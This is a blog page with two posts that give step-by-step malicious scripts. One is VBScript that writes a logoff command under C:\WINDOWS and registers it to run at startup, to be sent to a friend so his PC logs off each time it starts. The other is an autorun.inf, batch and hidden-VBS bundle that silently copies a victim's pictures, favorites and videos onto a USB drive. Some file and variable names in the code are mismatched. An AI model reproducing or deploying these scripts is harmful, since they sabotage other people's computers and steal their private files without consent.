This blog is officialy managed by Shahnawaz Alam. You can get here amazing collections of information which you have never ever seen, heard and experienced before

Friday 14 February 2014

VIRUS THAT SHUTDOWN THE PC AT EVERY STARTUP

00:18 Posted by Unknown , No comments
Hello Friends,
Today i am going to share something disasterous

This post of virus programming will tell you about... how you can make a virus that will shutdown a PC Automatically at Startup. Every time when a victim will restart his PC, it will be shutdown.

Ok, just open the notepad and type or paste the following code:

set ws=createobject("wscript.shell")
dim strDir,strfile,st,strtxt2,strshell,strlog
dim obfso,obfolder,obshell,obfile,obtxtfile
strshell="wscript.shell"
strDir="C:\WINDOWS"
strfile="\wscript.vbs"
st=Chr(34)
strlog="shutdown -l"
strtxt2="ws.run(strlog)"
set obfso=CreateObject("Scripting.FileSystemObject")
on error resume next
set obfile=obfso.CreateTextfile(strDir & strfile)
obfile.writeline("set ws=createobject("&st&strshell&st&")")
obfile.writeline("ws.run("&st&strlog&st&")")
ws.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Logoff","C:\WINDOWS\wscript.vbs","REG_SZ”

Now save this notepad file with any name having ".vbs" extension E.g., Shahnawaz's fork bomb.vbs

Now send it to ur friend.... and Frustrate your friend by shutting down his computer automatically on startup

How to get rid of this virus:
for that just boot ur system in safe mode and then go to directory c:\ windows.... find out wscript.vbs file there.... and delete it

COPY DATA FROM SOMEONE'S USB WITHOUT INFORMING HIM

00:12 Posted by Unknown , No comments
This trick will enable you to copy data from anyone's USB without any notifications or without informaing him. Here is a Trick which can help you to Copy and Steal all the Secret Data or Files from the Victims Computer by just plugging the USB or Pendrive to the Computer.

This Trick could prove to be very helpful and it would Copy and Steal all the Data without the Confirmation and Knowing of Computer Owner.

To use this Trick just follow these simple Steps :

1) Open Notepad.

2) Copy and Paste the following Code into Notepad :

[autorun]
icon=drive.ico
open=launch.bat
action=Click OK to Run
shell\open\command=launch.bat

3) Save this file as autorun.inf.

4) Open Notepad again.

5) Copy and Paste the following Code :

@echo off
:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo off
%backupcmd% "%USERPROFILE%\pictures" "%drive%\Data\My pics"
%backupcmd% "%USERPROFILE%\Favorites" "%drive%\Data\Favorites"
%backupcmd% "%USERPROFILE%\videos" "%drive%\Data\vids"
@echo off
cls

6) Save this file as File.bat.

7) Open Notepad again.

8) Copy and Paste the following Code :

CreateObject("Wscript.Shell").
Run """" & WScript.Arguments(0) & """", 0, False

9) Save this file as Invisible.vbs.

10) Now again open Notepad.

11) Now Copy and Paste the following Code :

wscript.exe \invisible.vbs file.bat

12) Save this as Launch.bat.

13) Now Copy and Paste all the four (4) files created in the above steps to the USB or

Pendrive.

14) Create a folder named “Data” where the Stolen contents would be Copied automatically.